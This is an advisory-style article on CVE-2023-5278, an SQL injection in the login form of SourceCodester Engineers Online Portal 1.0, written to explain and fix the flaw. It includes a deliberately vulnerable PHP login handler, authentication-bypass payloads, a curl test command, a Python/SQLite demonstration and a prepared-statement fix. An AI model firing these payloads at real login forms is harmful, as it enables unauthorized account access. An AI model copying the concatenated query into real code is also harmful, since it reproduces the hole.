A critical vulnerability, CVE-2023-5278, was found in SourceCodester Engineers Online Portal 1.0. The login.php script builds its SQL query directly from the username and password fields, so an attacker can perform SQL injection through the login form without any prior authentication. Left unfixed, this can give attackers unauthorized access to user accounts and the data behind them, and, depending on the privileges of the database account, a foothold towards full control of the system.

If you run this portal, act quickly. In this article, we break down the problem, show how it is exploited, and explain how to fix it.

Summary

- Vulnerability ID: CVE-2023-5278 (VDB-240906)
- Bug type: SQL Injection
- Affected software: SourceCodester Engineers Online Portal 1.0
- Location: login.php (username / password fields)

How the Attack Happens

SQL injection occurs when attacker-controlled input becomes part of the SQL text the application sends to its database, letting the attacker change the structure of the query rather than just the value it compares against. In this case, the login form neither escapes dangerous characters nor separates data from the query, so an attacker can send input that rewrites the logic of the SQL behind the scenes.

Here is a basic PHP login handler with the same flaw (simplified for illustration):

<?php
session_start();
include('db.php'); // provides $conn, an open mysqli connection

if (isset($_POST['login'])) {
    $username = $_POST['username']; // unsanitized!
    $password = $_POST['password']; // unsanitized!

    // User input is spliced straight into the SQL text.
    $query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
    $result = mysqli_query($conn, $query);

    if (mysqli_num_rows($result) == 1) {
        // Login ok
        $_SESSION['user'] = $username;
        header("location: dashboard.php");
        exit; // stop the script after issuing the redirect
    } else {
        // Login failed
        echo "Invalid login";
    }
}
?>

Problem: the $username and $password variables go directly into the SQL string without any sanitization or parameterization. Suppose an attacker submits the following values:

Username: ' OR '1'='1

Password: ' OR '1'='1

The SQL becomes

SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'

Because '1'='1' is always true, the WHERE clause matches every row (AND binds tighter than OR, so the clause reads as username='' OR ('1'='1' AND password='') OR '1'='1', and the last term alone makes it true). Note that the handler above accepts a login only when exactly one row comes back, so against a table with several users this all-rows payload is rejected. An attacker simply narrows the result instead, for example with a username of admin' -- (when the account name is known) or ' OR '1'='1' LIMIT 1 -- , which returns only the first row, commonly the admin account, and logs the attacker in as that user.

You can test for this from the command line with curl. Use --data-urlencode so the quotes, spaces and the trailing comment marker reach the server intact (MySQL's -- comment requires the space that follows it):

curl -i -X POST http://target-site.com/login.php \
  --data-urlencode "username=' OR 1=1 -- " \
  --data-urlencode "password=' OR 1=1 -- " \
  --data-urlencode "login=Login"

A 302 redirect to dashboard.php instead of the "Invalid login" text means the injection bypassed authentication. A database error in the response to a lone single quote (username=') is usually the first sign that input reaches the query unescaped, even when the bypass itself fails.

References

- VulDB entry VDB-240906
- CVE-2023-5278 NVD
- SourceCodester Demo
- What is SQL Injection? (OWASP)

How to Fix This

The best way is to use prepared statements with parameterized queries, so the SQL text is fixed before any user data is seen. Here is the handler rewritten with mysqli in PHP:

<?php
session_start();
include('db.php'); // provides $conn, an open mysqli connection

if (isset($_POST['login'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    // The query text contains only placeholders; the values are sent to the
    // server separately, so quotes or comment markers in them cannot change
    // the structure of the statement.
    $stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
    $stmt->bind_param("ss", $username, $password);

    $stmt->execute();
    $result = $stmt->get_result(); // requires the mysqlnd driver

    if ($result->num_rows == 1) {
        $_SESSION['user'] = $username;
        header("location: dashboard.php");
        exit; // stop the script after issuing the redirect
    } else {
        echo "Invalid login";
    }
}
?>

Key changes

- The query uses ? placeholders and the values are bound with bind_param, so attacker input is always treated as data, never as SQL.
- The script exits after the redirect header, so no further code runs for an unauthenticated request.
- What this does not fix: the handler still compares passwords in plaintext. Store them with password_hash(), look the user up by username only, and check the submitted password with password_verify().
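To make the behaviour described in the attack walk-through and in the fix concrete, here is an added example (not code from the original article or from the SourceCodester project). It uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL portal; the two sample accounts are constructed, and the plaintext password column only mirrors the page's snippets. vulnerable_login() splices input into the SQL text exactly like the original login.php, including the "exactly one row" check; safe_login() binds the values like the fixed version. Running it shows that the all-rows payload fails the one-row check against a two-user table, that the narrowing payloads succeed, that a lone quote produces a database error (the classic detection signal), and that every payload is inert once the query is parameterized.

```python
import sqlite3

# Constructed sample accounts standing in for the portal's users table. The
# plaintext password column mirrors the PHP snippets on this page; it is not
# a recommendation.
SAMPLE_USERS = [("admin", "S3cret!"), ("student1", "hunter2")]


def make_db():
    """Build an in-memory SQLite database (stand-in for the portal's MySQL schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Mirror of the original login.php: user input is spliced into the SQL text.

    Returns (logged_in, rows_returned). rows_returned is None when the database
    rejected the statement, which is what a lone quote in the input produces.
    The login succeeds only when exactly one row comes back, just like the
    mysqli_num_rows($result) == 1 check in the PHP handler.
    """
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.OperationalError:
        return False, None
    return len(rows) == 1, len(rows)


def safe_login(conn, username, password):
    """Mirror of the fixed login.php: the SQL text is fixed, the values are bound."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchall()
    return len(rows) == 1, len(rows)


# The payloads from the article plus the two narrowing variants it discusses.
PAYLOADS = {
    "legit": ("admin", "S3cret!"),
    "all_rows": ("' OR '1'='1", "' OR '1'='1"),
    "first_row": ("' OR '1'='1' LIMIT 1 -- ", "anything"),
    "known_user": ("admin' -- ", "anything"),
    "lone_quote": ("'", "anything"),
}

if __name__ == "__main__":
    conn = make_db()
    for name, (user, pw) in PAYLOADS.items():
        print(f"{name:11} vulnerable={vulnerable_login(conn, user, pw)} "
              f"safe={safe_login(conn, user, pw)}")
```

The SQLite comment and LIMIT syntax used here match MySQL for these payloads, so the row counts carry over to the real portal; the only difference you would see against MySQL is the exact wording of the error for the lone-quote probe.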

Final Advice

- Patch immediately: If you run SourceCodester Engineers Online Portal 1.0, replace the concatenated query in login.php with a prepared statement now, and check the portal's other scripts for the same pattern.
- Never trust user input: Validate it, and keep it out of SQL text altogether by using parameterized queries; escaping by hand is error-prone.
- Consider alternatives: If you cannot change the code, look for an updated release or move to a more actively maintained application.

Stay Safe

SQL injection has been among the most damaging and yet simplest attacks for years. CVE-2023-5278 in Engineers Online Portal is a clear reminder to never trust user data and to use parameterized queries everywhere. Fix your applications before someone else finds them vulnerable.

Need help or want to check your site? Start with the OWASP SQL Injection Prevention Cheat Sheet, or engage a security professional for a review.

Timeline

Published on: 09/29/2023 18:15:10 UTC
Last modified on: 11/07/2023 04:23:46 UTC